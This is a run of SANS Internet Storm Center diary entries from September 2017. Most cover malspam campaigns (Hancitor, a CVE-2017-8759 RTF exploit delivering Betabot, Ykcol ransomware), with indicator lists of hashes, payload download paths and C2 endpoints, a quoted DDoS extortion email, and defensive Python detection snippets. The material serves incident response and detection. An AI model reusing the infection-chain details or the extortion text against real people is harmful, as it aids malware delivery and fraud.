
What is the State of Your Union?, (Fri, Sep 22nd)

Regularly the President of the United States delivers the State of the Union address. This practice "fulfills rules in Article II, Section 3 of the U.S. Constitution, requiring the President to periodically give Congress information on the 'state of the union' and recommend any measures that he believes are necessary and expedient."

What if you as an information security leader held an information security State of the Union address with the explicit purpose of educating both your leaders and business partners on your information security program and the areas of focus for the next year? Communicating to those who are not in our area is certainly a challenge; however, the benefits outweigh the effort in several different ways.

By being intentional at sharing the state of your security union, you can not only deliver the status of your program but also equip your leaders with information they can quite literally share in environments that your team is not able to attend.  

What are some candidates to include in your State of the Union?

  • Effectiveness of your program
  • Opportunities to improve your program
  • Communicate recent achievements
  • Demonstrate stewardship of your resources
  • Show how your team supported objectives of your organization
  • Possible actions that you want others to take
  • Clear call to action to the leaders to increase support, funding, and staffing
  • Opportunity to receive feedback

How are you communicating the State of Your Security Union? Please leave what works in our comments section below!

Russell Eubanks

ISC Handler

SANS Instructor


(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
September 22, 2017

Malspam pushing Word documents with Hancitor malware, (Fri, Sep 22nd)


I previously wrote a diary on Hancitor back in February 2017.  Even though I haven't written a diary about it lately, it's been a near-daily occurrence since then.  There's been no significant change, which is why I haven't bothered.  Thursday 2017-09-21 included yet another wave of malicious spam (malspam) pushing Hancitor Word documents.  Since it's been a while, let's review indicators for this most recent wave.

Hancitor, also known as Chanitor or Tordal, pushed Pony and Vawtrack last year.  However, this year it stopped using Vawtrack and now pushes DELoader/ZLoader.  The most recent technical write-ups I've seen on Hancitor are here, here, and here.

At least two Twitter accounts routinely tweet indicators for Hancitor malspam like URLs and file hashes.  The ones I routinely check are @cheapbyte (example) and @James_inthe_box (example).  However, other accounts also tweet Hancitor indicators.  You can keep up with this near-daily information by searching Twitter for recent tweets tagged #hancitor.

The emails

Thursday's emails were disguised as yet another invoice, this time spoofing a company named Advanced Maintenance.  Advanced Maintenance is a general contract and maintenance "handyman" company with various locations in the US.  The emails all spoof a domain name registered by the company's President/CEO named  However, these messages are not related to Advanced Maintenance, and they do not actually come from that domain.

Advanced Maintenance is aware of this malspam.  If you go to the company's official website, you'll see a warning to ignore these emails.

Shown above:  Pop-up message from the company's official website.

Links in the email point to various URLs designed to download a malicious Word document.  As in previous waves of malspam, the downloaded Word document has macros designed to infect a vulnerable Windows computer, if enabled.

Shown above:  Screenshot from one of the emails.

Shown above:  Clicking on a link from the email sent me a malicious Word document.

Shown above:  The malicious Word document waiting for me to enable macros.

The traffic

I infected a host in my lab.  Network traffic was typical for what we've seen in recent months from Hancitor malspam.  The only difference?  I didn't see a base64 string in the initial HTTP GET request for the Word document like I did earlier this week.  That base64 string represents the recipient's email address, which has been standard practice for months now.  However, this time, the initial HTTP GET request used a plaintext string for the recipient's email address.

Shown above:  Traffic from an infection filtered in Wireshark.

Snort and Suricata alerts on the network traffic are the same as we've seen for months now.  This campaign has slowly evolved, but it's noticeably the same as earlier this year.

Shown above:  Some alerts from the Snort subscription ruleset using Snort

Shown above:  Some alerts from the EmergingThreats Pro ruleset with Suricata on Security Onion.

The infected host

After a cursory search, I couldn't determine how malware stays persistent on an infected Windows host.  However, I did find several artifacts for encrypted traffic-related services like Tor.

Shown above:  Artifacts found in an infected user's AppData\Local\Temp directory.

Shown above:  Artifacts found in an infected user's AppData\Roaming directory.

Indicators of Compromise (IOCs)

The following IOCs and other indicators are for Hancitor malspam on Thursday 2017-09-21.

Email headers:

  • Date/Time:  Thursday 2017-09-21 as early as 16:58 UTC through at least 18:42 UTC
  • Sender (spoofed):  "Advanced Maintenance Inc." <>
  • Examples of subject lines:
    • Subject:  FW: Your Invoice I114738207 from Advanced Maintenance
    • Subject:  FW: Your Invoice I131761045 from Advanced Maintenance
    • Subject:  FW: Your Invoice I144174411 from Advanced Maintenance
    • Subject:  FW: Your Invoice I156641102 from Advanced Maintenance
    • Subject:  FW: Your Invoice I182402737 from Advanced Maintenance

Associated traffic:

  • EAFGI.COM - GET /in.php?n=[recipient's email address]
  • - GET /in.php?n=[recipient's email address]
  • - GET /in.php?n=[recipient's email address]
  • TRUSTDEEDCAPITAL.NET - GET /in.php?n=[recipient's email address]
  • TRUSTDEEDCAPITAL.ORG - GET /in.php?n=[recipient's email address]
  • - GET /in.php?n=[recipient's email address]
  • port 80 - - POST /ls5/forum.php
  • port 80 - - POST /mlu/forum.php
  • port 80 - - POST /d2/about.php
  • port 80 - - GET /wp-content/plugins/all-in-one-seo-pack/1
  • port 80 - - GET /wp-content/plugins/all-in-one-seo-pack/2
  • port 80 - - GET /wp-content/plugins/all-in-one-seo-pack/3
  • port 80 - - POST /bdl/gate.php
  • - GET /
  • - GET /
  • Various IP addresses over various TCP ports - Tor traffic
  • port 443 - TCP SYN packet approx once every 5 minutes
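The GET /in.php?n= requests listed above carry the recipient's address either base64-encoded (earlier waves) or in plaintext (this wave). The following Python is an added example, not code from the diary: it runs over a few constructed proxy log lines in a hypothetical "client method host path" layout, matches the request pattern from the IOC list, and recovers the targeted mailbox in either form, so the message can be pulled from that mailbox and the requesting client checked. Only the hostnames come from the IOC list; the client IPs and addresses are made up.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Constructed sample proxy log lines (hypothetical "client method host path" layout).
# The hostnames come from the diary's IOC list; client IPs and recipient
# addresses are made up for this example.
SAMPLE_LOG = """\
10.1.1.21 GET eafgi.com /in.php?n=dXNlckBleGFtcGxlLmNvbQ%3D%3D
10.1.1.35 GET trustdeedcapital.net /in.php?n=alice@example.org
10.1.1.40 GET www.example.com /index.html
10.1.1.52 GET trustdeedcapital.org /in.php?n=not-an-email
"""

# One log line -> client, host and the raw n= value of a Hancitor document request.
IN_PHP = re.compile(r"^(?P<client>\S+)\s+GET\s+(?P<host>\S+)\s+/in\.php\?n=(?P<n>\S+)$")
# Deliberately loose: we only need to tell "looks like an address" from "does not".
EMAIL = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def decode_recipient(value):
    """Return (recipient, encoding) for the n= parameter, or (None, "unknown").

    Earlier waves carried the recipient as a base64 string; the 2017-09-21 wave
    sent it in plaintext, so both forms are accepted.
    """
    value = unquote(value)  # proxies often log '=' as %3D
    if EMAIL.match(value):
        return value, "plaintext"
    try:
        padded = value + "=" * (-len(value) % 4)
        decoded = base64.b64decode(padded, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None, "unknown"
    if EMAIL.match(decoded):
        return decoded, "base64"
    return None, "unknown"


def find_hancitor_downloads(log_text):
    """Pick out /in.php?n= requests and name the user whose mailbox was targeted.

    A hit means that client fetched the Hancitor Word document; the recipient is
    the address the attacker used, i.e. the mailbox to pull the message from.
    """
    hits = []
    for line in log_text.splitlines():
        m = IN_PHP.match(line)
        if not m:
            continue
        recipient, encoding = decode_recipient(m.group("n"))
        hits.append({
            "client": m.group("client"),
            "host": m.group("host"),
            "recipient": recipient,
            "encoding": encoding,
        })
    return hits


if __name__ == "__main__":
    for hit in find_hancitor_downloads(SAMPLE_LOG):
        print(hit)
```

The host list is the part to keep current: the download domains change from wave to wave, while the /in.php?n= shape has stayed stable for months.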

Malware recovered from the infected host:

SHA256 hash:  39d99fdcc0bd9bb9c7ccf65af499eec073265424f1310bc02b51954b8f6f9782

  • File size:  390,656 bytes
  • File name:  invoice_729017.doc
  • File description:  Word document with macros that run Hancitor

SHA256 hash:  7ffcaf562952dc920e5026c862b4034cadb4ef8c59ec96a5ae0a2768db513746

  • File size: 194,048 bytes
  • File location:  C:\Users\[username]\Local\Temp\BNE53F.tmp
  • File location:  C:\Users\[username]\Roaming\Awceiv\coof.exe
  • File description:  Follow-up malware, DELoader/ZLoader

Final words

As it stands, the open nature of our Internet makes it easy for criminals behind Hancitor malspam and other campaigns to operate.  For example:

  • Email protocols make it trivially easy for criminals to spoof a sending address and other header lines to mislead recipients.
  • Hosting providers and tools like Wordpress allow practically anyone to set up a website, then forget to keep it patched and up-to-date.  Enormous numbers of these legitimate websites are compromised by criminals and used in various campaigns.
  • Requirements to fraudulently establish an account at a hosting provider are easy to obtain.  This encourages a cycle of abuse as criminals establish new servers, those servers are reported, the hosting provider shuts them down, and criminals set up new servers.
  • Windows is still a mainstream operating system, and its default settings provide criminals relatively easy targets to infect.  Outdated versions like Windows 7 and XP still account for over 50% of the desktop market share.  These hosts are even easier to infect, especially if they're not up-to-date and patched.

I view network-enabled computing devices like I view most middle-aged adults living a sedentary lifestyle.  Both are probably healthier than they seem, even if there is plenty of room for improvement.  All you need is the right mindset.  The Internet is a wonderful place, but it's also a great equalizer.  Both good and bad people coexist in the same space when we're online.  It pays to be careful if you're out and about in a cyber sense--whether you're reading email, browsing the web, or interacting with social media.

As usual, it's relatively easy for system administrators (and the technically inclined) to follow best security practices on their Windows computers.  Using Software Restriction Policies (SRP) or AppLocker can easily prevent these types of malspam-based infections from occurring.  If you have any other tips, please share them in the comments.

Traffic and malware samples for today's diary can be found here.

Brad Duncan
brad [at]

September 22, 2017

ISC Stormcast For Friday, September 22nd 2017;id=5680, (Fri, Sep 22nd)

September 21, 2017

Emails threatening DDoS allegedly from Phantom Squad, (Thu, Sep 21st)


As a follow-up to one of our June 2017 diaries asking people to forward us any DDoS threats, we received yet another example: 

Date: Tuesday 2017-09-19 at 18:04 UTC
Subject: DDoS Warning
From: <>
Message-Id: <1505844251.007448.31360.nullmailer@me>

Hello, [removed]


We are Phantom Squad

Your network will be DDoS-ed starting Sept 30st 2017 if you don't pay protection fee - 0.2 Bitcoin @ [removed].

If you don't pay by Sept 30st 2017, attack will start, yours service going down permanently price to stop will increase to 20 BTC and will go up 10 BTC for every day of attack.

This is not a joke.



Since 2017-09-19, at least 4 people have tweeted about the same type of emails, supposedly from Phantom Squad:

This feels like a scam using the notoriety of Phantom Squad's name, because the group has gotten some fairly high-profile press coverage in recent years.  In December 2015, Phantom Squad claimed responsibility for a DDoS attack against Xbox Live.  A year later in December 2016, Phantom Squad was apparently involved in a DDoS attack against Steam.  However, I haven't found any evidence yet this group is involved in small business extortion.

Whether this email is legitimate or fake, these messages all use the notoriety of the group's name to make the threat sound plausible.

In our June 2017 diary about fake DDoS extortion emails, Johannes Ullrich provides some guidance for people that receive these types of messages.  Tips include:

  • Verify your DDoS plan:  Do you have an agreement with an anti-DDoS provider?  A contact at your ISP?  If so, make sure everything is set up and working right.
  • Attackers often run short tests before launching a DDoS attack.  Can you find any evidence of that?  Has there been a brief, unexplained traffic spike?  If so, take a closer look.  The threat is more serious if you detect an actual test, because the purpose of a test is often to assess the firepower needed to DDoS your network.

Final words

Thanks to everyone who already forwarded examples to us.  As Johannes previously asked in June 2017, please continue to forward us any similar emails.  We can always use the additional data.

A sanitized copy of our most current example can be found here.  It's in a password-protected zip archive.  If you don't know the password, look here.

Brad Duncan
brad [at]

September 21, 2017

Email attachment using CVE-2017-8759 exploit targets Argentina, (Thu, Sep 21st)


On 2017-09-12, FireEye published a blog post about a zero-day exploit utilizing CVE-2017-8759.  The vulnerability was fixed that same day with Microsoft's September 2017 Security Updates.

In FireEye's blog post, this exploit was used against Russian speakers to distribute FINSPY malware.  By 2017-09-19, I had run across another email, spoofing an Argentine government agency, that used a CVE-2017-8759 exploit to distribute Betabot malware.

Today's diary reviews the email, malware, and traffic associated with this most recent exploit for CVE-2017-8759.

The email and attachment

The email pretends to be from the Administracion Federal de Ingresos Publicos (AFIP), an Argentine government agency responsible for tax collection and administration.  The message actually came from a commercial mail server on an IP address assigned to Gualberto Larrauri, an Argentina-based Internet service provider (ISP).

The message describes the attachment as a manual for the AFIP purchasing portal.  The attachment is a zip archive, and that archive contains a Rich Text Format (RTF) file with .doc as the file extension.  True to its word, the RTF file contains an annex to the official AFIP document covering the subject.  It also contains an exploit for CVE-2017-8759.  Merely opening the file using Microsoft Word will infect a vulnerable Windows computer.
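The attachment described above is a zip archive holding an RTF file that carries a .doc extension. As an added example (not code from the diary or from FireEye), the Python below checks every member of a zip attachment in memory against its leading bytes and flags any whose extension promises one container but whose content is another. The archive it inspects is constructed inline: a harmless RTF stub named comprasAnexoII.doc, the file name from this diary, plus a text note.

```python
import io
import os
import zipfile

# Magic bytes for the container types that matter in this diary; any file we
# cannot recognise is reported as "unknown".
SIGNATURES = [
    (b"{\\rtf", "rtf"),                                 # Rich Text Format
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2"),      # legacy binary .doc/.xls/.ppt
    (b"PK\x03\x04", "zip"),                             # zip, and OOXML such as .docx
    (b"MZ", "pe"),                                      # Windows executable
]

# What each extension should contain. A .doc that is really RTF is exactly the
# trick used by the AFIP attachment (comprasAnexoII.doc is an RTF file).
EXPECTED_BY_EXT = {
    ".doc": {"ole2"},
    ".docx": {"zip"},
    ".rtf": {"rtf"},
    ".zip": {"zip"},
    ".exe": {"pe"},
}


def sniff(data):
    """Identify content by its leading bytes, ignoring the file name entirely."""
    for magic, kind in SIGNATURES:
        if data[:len(magic)] == magic:
            return kind
    return "unknown"


def check_member(name, data):
    """Compare a file's extension with what its bytes say it is.

    mismatch is True when the extension has a known expectation that the
    content does not meet, False when it meets it, and None when we have no
    expectation for that extension.
    """
    ext = os.path.splitext(name)[1].lower()
    detected = sniff(data)
    expected = EXPECTED_BY_EXT.get(ext)
    mismatch = None if expected is None else detected not in expected
    return {"name": name, "ext": ext, "detected": detected, "mismatch": mismatch}


def scan_zip_attachment(zip_bytes):
    """Inspect every member of a zip attachment in memory, without extracting to disk."""
    results = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # Only the first few bytes are needed for the signature check.
            with zf.open(info) as fh:
                head = fh.read(16)
            results.append(check_member(info.filename, head))
    return results


def build_sample_attachment():
    """Constructed stand-in for the email attachment: a zip holding a harmless
    RTF stub that carries a .doc extension, plus a plain text note."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("comprasAnexoII.doc", b"{\\rtf1\\ansi constructed sample, no exploit}")
        zf.writestr("leeme.txt", b"constructed sample note")
    return buf.getvalue()


SAMPLE_ATTACHMENT = build_sample_attachment()

if __name__ == "__main__":
    for r in scan_zip_attachment(SAMPLE_ATTACHMENT):
        print(r)
```

Word will happily open RTF content under a .doc name, so the mismatch itself is not malicious; it is a cheap triage signal that says "look at this one first", and it catches the RTF-as-.doc pattern regardless of which exploit the RTF carries.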

Shown above:  Screenshot of the email.

Shown above:  Email headers indicate where the email actually came from.

Shown above:  The email attachment and extracted RTF document.

Follow-up malware

Opening the RTF document generated Powershell activity that retrieved a Windows executable.  This follow-up executable triggered EmergingThreats alerts for Neurevt.A/Betabot when I infected a host in my lab.  The malware was made persistent through a Windows registry update.

Shown above:  Follow-up malware (Betabot) made persistent on the infected Windows host.

Network traffic

Infection traffic included HTTP requests for SOAP code injection, JavaScript, Powershell script, and a Windows executable over TCP port 8007.  Post-infection activity consisted of HTTP POST requests over TCP port 80.

Shown above:  Network traffic for this infection filtered in Wireshark.

Shown above:  Alerts from Sguil in Security Onion using Suricata with the EmergingThreats Pro ruleset.

Indicators of Compromise (IOCs)

Headers from the email:

  • Received:  from ([])
  • Envelope-sender:  <> 
  • Message-ID:  <>
  • Date:  Tuesday, 2017-09-19 at 21:48 UTC
  • From:  "Administracion Federal de Ingresos Publicos - (AFIP)" <>
  • Subject:  Noticia de Actualizacion - Sistema de Compras (AFIP)

File hashes:

SHA256 hash:  7bd46284dabf1f400102aa35e123eb2ffe2838560fbc016ba4f2cd376742004c

  • File size:  52,132 bytes
  • File type:  Zip archive
  • File name:
  • File description:  Email attachment

SHA256 hash:  4a07c6f26ac9feadbd78624d4e063dfed54e972772e5ee34c481bdb86c975166

  • File size:  286,981 bytes
  • File type:  Rich Text Format (RTF) file
  • File name:  comprasAnexoII.doc
  • File description:  RTF file with CVE-2017-8759 exploit

SHA256 hash:  610e6611b3b2e3bd85173cba76bf069fb7134b86f533141f79811fcc29d62b33

  • File size:  440,832 bytes
  • File type:  PE32 executable
  • File location:  hxxp://
  • File location:  C:\ProgramData\SystemMicrosoftDefender2.1\[random characters].exe
  • File description:  Follow-up malware, Neurevt.A (Betabot)

Infection traffic:

  • port 8007 - - GET /txt/doc.txt
  • port 8007 - - GET /txt/accounts.hta
  • port 8007 - - GET /txt/pause.ps1
  • port 8007 - - GET /txt/words.exe

Post-infection traffic:

  • port 80 - - POST /.av/logout.php
  • port 80 - - POST /.av/logout.php?id=[various numbers]

Final words

As I write this, nine days have passed since Microsoft released its update to address CVE-2017-8759.  The associated exploit is no longer a zero-day.  If your organization follows best security practices, you should be fine.

However, many organizations are notoriously slow to apply these updates.  Be aware this exploit is active in the wild.  I'm sure it will eventually find its way to wide-scale distribution through malicious spam.

A copy of the email, traffic, and associated malware for today's diary can be found here.

Brad Duncan
brad [at]

September 21, 2017

ISC Stormcast For Thursday, September 21st 2017;id=5678, (Thu, Sep 21st)

September 20, 2017

Ongoing Ykcol (Locky) campaign, (Wed, Sep 20th)

Today I noticed a high volume of e-mails on my honeypots with similar subjects, bodies and attachments, which caught my attention. After inspecting the attachments and doing some analysis, it was not difficult to realize that those supposed “Status Invoice” messages were, indeed, part of an ongoing campaign pushing a Locky ransomware variant that is being called Ykcol (Locky in reverse) due to the encrypted file extension (“.ykcol”).

In today’s phishing messages, I noticed an additional subject line, “Your Payment”, and “.rar” attachments instead of the “.zip” ones seen two days ago, based on a post from Bleeping Computer[1].

The threat flow of today’s campaign is very simple and can be seen in Figure 1.

Figure 1 – YKCOL Threat Flow


Indicators of compromise (IOCs)

From the samples I received, it was possible to identify 4 (four) different VBS samples, from which the following IOCs were extracted:


MD5 (20080920_239777.vbs) = a93845a2e5e4660fb673d949a1f69bc6
MD5 (20080920_387690.vbs) = 2a067fb838be5af230df6a51aa25ea08
MD5 (20080920_441014.vbs) = 638d0a50bf8a166ffed382b7f9935c4e
MD5 (20080920_860397.vbs) = 77482e00daafbb3cec934c98510f0e19
MD5 (RSkfsNR7*) = 83be007cb41eec07e5ae8270cf98a7a6

* Although I tried to manipulate the HTTP POST request changing the parameter “UA-CPU: AMD64” to other architectures, the binary offered by the server in response was the same.




All e-mails were sent by “ordering” @ some domain, like: or with a message like the following one:


Could you please let me know the status of the attached invoice? I
appreciate your help!

Best regards,

Final words


Something that caught my attention during the YKCOL VBS analysis was that the scripts were not obfuscated and contained lots of code unrelated to malicious activity or C&C communication. Figure 2 shows a random function called Anim2UniBall that is never called by the script:


Figure 2 – Random code snippet


Searching for this code snippet, I could find many similarities with a gaming framework called OpenARC [2], a clone of a 20-year-old game called “Attack, Retrieve, Capture”.

Games apart, could not obfuscating the script and including random code be a strategy to evade anti-malware heuristics? Or perhaps an attempt to trick someone who does not read the code carefully into executing it?
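One way to put a number on the padding observed above is to count the procedures a script defines but never calls. The Python below is an added example, not part of the diary or of any product: it walks a constructed, harmless VBScript sample with Function/Sub definitions, finds which names are never referenced outside their own body, and reports the dead-procedure ratio and the fraction of script lines those procedures occupy. The comment stripping is naive (it ignores quotes inside strings) and the parser does not handle nested or one-line procedures; both are simplifications.

```python
import re

# Constructed VBScript sample, harmless: two procedures are defined but never
# used, mimicking the game-framework padding seen in the Ykcol droppers.
SAMPLE_VBS = r"""
' constructed sample - game-style padding that nothing ever calls
Function Anim2UniBall(x, y)
    Anim2UniBall = x * y
End Function

Sub DrawBoard()
    ' never called
End Sub

Function GetPath()
    GetPath = "C:\Temp"
End Function

Sub Main()
    Dim p
    p = GetPath()
    Main2 p
End Sub

Sub Main2(arg)
    WScript.Echo arg
End Sub

Call Main
"""

DEF_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Function|Sub)\s+(\w+)", re.IGNORECASE)
END_RE = re.compile(r"^\s*End\s+(?:Function|Sub)\b", re.IGNORECASE)


def _strip_comment(line):
    """Drop a trailing VBScript comment (naive: ignores quotes inside strings)."""
    return line.split("'", 1)[0]


def find_procedures(script):
    """Return [(name, first_line, last_line)] for every Function/Sub definition."""
    procs = []
    current = None
    for idx, line in enumerate(script.splitlines()):
        m = DEF_RE.match(line)
        if m and current is None:
            current = [m.group(1), idx]
        elif END_RE.match(line) and current is not None:
            procs.append((current[0], current[1], idx))
            current = None
    return procs


def dead_procedures(script):
    """Names defined but never referenced outside their own body (VBScript is
    case-insensitive, so the reference search is too)."""
    lines = [_strip_comment(l) for l in script.splitlines()]
    dead = []
    for name, start, end in find_procedures(script):
        ref = re.compile(r"\b" + re.escape(name) + r"\b", re.IGNORECASE)
        outside = "\n".join(lines[:start] + lines[end + 1:])
        if not ref.search(outside):
            dead.append(name)
    return sorted(dead)


def padding_report(script):
    """Summarise how much of the script is never-called procedure code."""
    procs = find_procedures(script)
    dead = dead_procedures(script)
    total_lines = max(1, len(script.splitlines()))
    dead_lines = sum(end - start + 1 for name, start, end in procs if name in dead)
    return {
        "defined": len(procs),
        "dead": dead,
        "dead_ratio": len(dead) / len(procs) if procs else 0.0,
        "dead_line_fraction": dead_lines / total_lines,
    }


if __name__ == "__main__":
    print(padding_report(SAMPLE_VBS))
```

A high dead-procedure ratio on a short script that still reaches out to the network is a reasonable triage signal; on its own it proves nothing, since legitimate copy-pasted library code is also full of unused routines.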

Renato Marinho
Morphus Labs | LinkedIn | Twitter

September 20, 2017

ISC Stormcast For Wednesday, September 20th 2017;id=5676, (Wed, Sep 20th)

September 19, 2017

New tool:, (Tue, Sep 19th)

On a recent forensic investigation where we couldn't take the Linux system down to image the disks, I was forced to do live response. Fortunately, I was able to get a memory image, but I also wanted a filesystem timeline. I first went to my old friend fls from The SleuthKit (TSK), but for some reason, it failed. So, I tried mac-robber (also from TSK) and it, too, failed. Not one to give up easily, I decided to write my own version of mac-robber in Python.

Like the TSK mac-robber, it outputs the data in body file format (so that it can be fed into mactime or elasticsearch). Like the TSK version, by default it does not hash the files (so it doesn't modify access times), so the "MD5" column defaults to 0. In this case, though, I had reason to believe that there might be multiple copies of some potential malware scattered around the filesystem, so I really wanted to grab hashes, too. So I included the capability in the tool (in my next diary, I'll explain the trick I used to grab hashes without modifying access times).

A couple of other notes on the tool. It only hashes "regular" files; it doesn't attempt to hash soft links, block or character device files, pipes, or sockets. It also skips /proc/kcore, which to os.stat() looks like a regular file but on my dev box is 128TB (a little more than I want to hash). At the moment, it uses MD5 as the hash because that is what fls uses, but I could easily be talked into substituting SHA256 (or SHA3 of whatever length, though in Python < 3.6 this requires pip-installing the pysha3 module). Also, due to a limitation in Python's os.stat(), it only gives MAC times, not B time (even if available in the filesystem in question). The tool should work just fine on Linux/Unix, Mac OS X, or Windows with a standard install of Python 2.7 or later, though it has not been extensively tested on anything other than Linux to date.

Another feature that I added to mine was the ability to add or remove prefixes to the path and to exclude specific directories or files. The -m switch behaves just like the corresponding switch in fls and allows you to prefix the path with a system name or drive letter. The -r switch allows you to remove a prefix (for example, when the directory in question has been mounted on /mnt, but you want your report to show the actual path on the system in question). The -x option actually needs more work; at present, it isn't as flexible as I'd like, but if you want to skip a specific directory or file, you can.

The tool can be downloaded from my docker-forensics github and is distributed under the BSD 3-clause license. I hope you find it useful. If you have any questions, comments, suggestions, or bug fixes, please let me know via the comments here, our contact form, or create an issue (or pull request) on github.
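For readers who want to see what the body-file output described above looks like in practice, here is an added Python example written for this page; it is not the author's tool from the docker-forensics repository, and its function names and options are my own. It walks a directory with os.walk and os.lstat, emits TSK 3.x body-file lines (MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime), leaves the MD5 column at 0 unless hashing is requested, hashes only regular files, skips /proc/kcore, writes 0 for crtime, and supports the path prefix, prefix removal and exclusion behaviour the diary describes. Hashing here reads the file the ordinary way, so it may update access times; the access-time trick the diary promises for a later entry is not reproduced. make_sample_tree() builds a throwaway directory so the script can be tried stand-alone.

```python
import hashlib
import os
import stat
import tempfile

# Files that os.stat() reports as regular but must never be read for hashing.
SKIP_HASH = {"/proc/kcore"}


def md5_of(path, chunk=1024 * 1024):
    """MD5 of a file's contents, read in chunks so large files do not fill memory.
    A plain read() updates atime on most filesystems; the diary's trick for
    avoiding that is not shown here."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def body_line(shown_path, st, digest="0"):
    """Format one entry in TSK 3.x body-file layout:
    MD5|name|inode|mode_as_string|UID|GID|size|atime|mtime|ctime|crtime.
    crtime is 0 because os.stat() gives no birth time on Linux."""
    fields = [
        digest,
        shown_path,
        str(st.st_ino),
        stat.filemode(st.st_mode),
        str(st.st_uid),
        str(st.st_gid),
        str(st.st_size),
        str(int(st.st_atime)),
        str(int(st.st_mtime)),
        str(int(st.st_ctime)),
        "0",
    ]
    return "|".join(fields)


def walk_bodyfile(root, prefix="", strip="", exclude=(), hash_files=False):
    """Walk `root` and return body-file lines for every directory entry.

    prefix     - text prepended to every reported path (like fls -m)
    strip      - leading text removed from every path (e.g. a /mnt mount point)
    exclude    - absolute paths of directories or files to leave out
    hash_files - if True, MD5 regular files; links, devices, pipes, sockets stay 0
    """
    exclude = set(exclude)
    lines = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune excluded directories in place so os.walk never descends into them.
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in exclude]
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if full in exclude:
                continue
            try:
                st = os.lstat(full)  # lstat: report the link itself, not its target
            except OSError:
                continue
            digest = "0"
            if hash_files and stat.S_ISREG(st.st_mode) and full not in SKIP_HASH:
                try:
                    digest = md5_of(full)
                except OSError:
                    digest = "0"
            shown = full[len(strip):] if strip and full.startswith(strip) else full
            lines.append(body_line(prefix + shown, st, digest))
    return lines


def make_sample_tree():
    """Constructed throwaway tree for trying the walker: returns (root, subdir)."""
    root = tempfile.mkdtemp(prefix="bodyfile_demo_")
    with open(os.path.join(root, "a.txt"), "wb") as fh:
        fh.write(b"hello")
    sub = os.path.join(root, "sub")
    os.mkdir(sub)
    with open(os.path.join(sub, "b.bin"), "wb") as fh:
        fh.write(b"\x00" * 10)
    return root, sub


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else make_sample_tree()[0]
    for line in walk_bodyfile(target, hash_files="--hash" in sys.argv):
        print(line)
```

The output feeds straight into mactime (for example `mactime -b body.txt -d`), and because every entry is built from one lstat() call, a run over a live system only touches metadata unless hashing is switched on.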



Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu


Upcoming course taught by Jim Clausing: Community SANS Ottawa, FOR610: Reverse-Engineering Malware: Malware Analysis Tools and Techniques, Ottawa, ON, Dec 4-9, 2017.
September 19, 2017

ISC Stormcast For Tuesday, September 19th 2017;id=5674, (Tue, Sep 19th)

September 18, 2017

SANS Securingthehuman posted a follow up to their Equifax breach webcast:, (Mon, Sep 18th)

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute

September 18, 2017

CCleaner 5.33 compromised -, (Mon, Sep 18th)

Version 5.33 of CCleaner[1] has been reported as compromised (only the 32-bit version) and delivers malware during installation. If you installed CCleaner between August 15th and September 12th, you should search for potentially infected systems. Here is the list of DGA domains that could help to track the infected hosts:


Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

September 18, 2017

Getting some intelligence from malspam, (Mon, Sep 18th)

Many of us receive a lot of malspam every day. By "malspam", I mean spam messages that contain a malicious document. This is one of the classic infection vectors today, and aggressive campaigns are started every week. Usually, most of them are blocked by modern antivirus or anti-spam, but these files can help us gather some intelligence about the topics used by attackers to fool their victims. By checking the names of malicious files (often .rar, .zip or .7z archives), we find classic words like ‘invoice’, ‘reminder’, ‘urgent’, etc. From an attacker's perspective, choosing the right name can increase the chances that the target will open the file, out of business need or just… curiosity!

I collected files attached to malicious emails and tried to categorize them to determine the most common names. To achieve this, I created a list of simple regular expressions based on classic strings and assigned a category to each. Both are stored in a CSV file:

Regex,Category
<redacted>,Targeted
<redacted>,Targeted
.*inv[oi]ce.*,Commercial
.*facture.*,Commercial
inv.*,Commercial
.*RF[QP].*,Commercial
.*order.*,Commercial
.*po.*,Commercial
.*quotation.*,Commercial
.*purchas.*,Commercial
.*voucher.*,Commercial
.*payment.*,Financial_Services
.*slip.*,Financial_Services
.*ban(k|que).*,Financial_Services
.*swift.*,Financial_Services
.*(HSBC).*,Financial_Services
.*remitance.*,Financial_Services
.*wire.*,Financial_Services
.*IDBI.*,Financial_Services
.*fraud.*,Financial_Services
.*loan.*,Financial_Services
.*paypal.*,Internet_Services
.*dropbox.*,Internet_Services
.*microsoft.*,Internet_Services
.*apple.*,Internet_Services
.*(DHL|UPS|TNT).*,Delivery_Services
.*parcel.*,Delivery_Services
.*shipping.*,Delivery_Services
.*packet.*,Delivery_Services
.*fax.*,Communication_Services
.*mfp.*,Communication_Services
.*voice.*,Communication_Services
.*scan.*,Communication_Services
.*email.*,Communication_Services
.*resume.*,Business_Services
.*cv.*,Business_Services
.*contract.*,Business_Services
.*letter.*,Business_Services
.*account.*,Business_Services
.*confirmation.*,Business_Services
.*confidential.*,Sensitive_Documents
.*crypted.*,Sensitive_Documents
.*urgent.*,Sensitive_Documents
.*secure.*,Sensitive_Documents
.*protected.*,Sensitive_Documents
\d+\.\s+,Numeric_Documents
.*booking.*,Booking_Services
.*photo.*,Media_Services
.*video.*,Media_Services
.*pic.*,Media_Services
.*foto.*,Media_Services
pdf.*,Media_Services
img.*,Media_Services
IMG.*,Media_Services

(Note that the first two lines have been obfuscated because they relate to really targeted attacks against an organization.)

